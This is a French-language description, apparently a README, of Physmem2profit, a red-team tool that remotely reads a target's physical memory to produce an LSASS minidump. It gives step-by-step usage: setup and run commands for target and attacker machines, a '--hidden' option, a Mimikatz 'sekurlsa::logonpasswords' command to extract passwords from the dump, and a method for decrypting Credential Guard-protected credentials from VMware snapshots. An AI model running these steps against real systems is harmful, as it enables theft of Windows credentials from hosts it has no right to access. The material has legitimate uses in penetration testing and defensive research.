
Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely
Physmem2profit peut être utilisé pour créer un minidump du processus LSASS d'une machine cible en analysant la mémoire physique à distance. L'intention de cette recherche est de proposer une approche alternative au vol d'informations d'identification et de créer un framework modulaire qui peut être étendu pour prendre en charge d'autres pilotes capables d'accéder à la mémoire physique. Physmem2profit génère un minidump (.dmp) de LSASS qui peut ensuite être analysé avec Mimikatz. L'outil ne nécessite pas Cobalt Strike mais devrait fonctionner correctement via un beacon avec un proxy SOCKS.
L'idée est illustrée ci-dessous :

L'outil comprend deux composants :
physmem2profit.exe, exécuté sur la machine cible
physmem2profit, exécuté sur la machine attaquante
--mode mount, se connecte à la machine cible et monte la RAM physique de la cible comme un fichier brut à l'aide de FUSE--mode dump, appelle divers plugins Rekall pour analyser l'image mémoire et générer un minidump du processus LSASS.--mode all, effectue les deux actions ci-dessus. La connexion avec le serveur sera fermée lorsque le dump sera terminé.git clone --recurse-submodules https://github.com/FSecureLABS/physmem2profit.gitphysmem2profit/server/Physmem2profit.sln avec Visual Studiobash physmem2profit/client/install.shphysmem2profit.exe [--ip IP] [-p PORT] [--hidden] [--verbose] sur la cible en tant qu'administrateur.
source physmem2profit/client/.env/bin/activate sur la machine attaquante. Cette commande activera l'environnement virtuel créé par install.sh.cd physmem2profit/client et python3 physmem2profit --host HOST [--port PORT] [--mode MODE] [--driver DRIVER ] [--instal DRIVER_PATH_ON_TARGET] [--label LABEL_FOR_MEMORY_DUMP] sur la machine attaquante
physmem2profit.exe doit être exécuté sur la machine cible avant de lancer cette commande.output/[label]-[date]-lsass.dmp sur la machine attaquante.mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit"Le déchiffrement des informations d'identification protégées par Credential Guard nécessite d'obtenir la clé de chiffrement stockée dans le Secure World. À des fins de test, Physmem2profit prend en charge la récupération des données du Secure World à partir des snapshots VMware Fusion/Workstation (fichiers .vmem). Cela permet de déchiffrer les informations d'identification protégées par Credential Guard à l'aide de Mimikatz.
msinfo32 pour vérifier que Virtualization-based security Services Running indique Credential Guardpython3 physmem2profit --mode dump --vmem /tmp/Win10-Snapshot1.vmem --label credential-guard-test
output/[label]-[date]-lsass.dmp. Le minidump contient un flux spécial qui contient les données du Secure World, permettant à Mimikatz de localiser la clé de chiffrement.output/[label]-[date]-secure-world.raw.mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit"Le support du contournement de Credential Guard en exploitant la vulnérabilité du firmware S3 Resume, démontrée lors de notre présentation à Disobey, arrive bientôt :).
Rethinking Credential Theft | un article de blog expliquant pourquoi cette approche du vol d'informations d'identification a été choisie.
Physmem2profit est développé par @b3arr0 et @TimoHirvonen.
Merci aux contributeurs :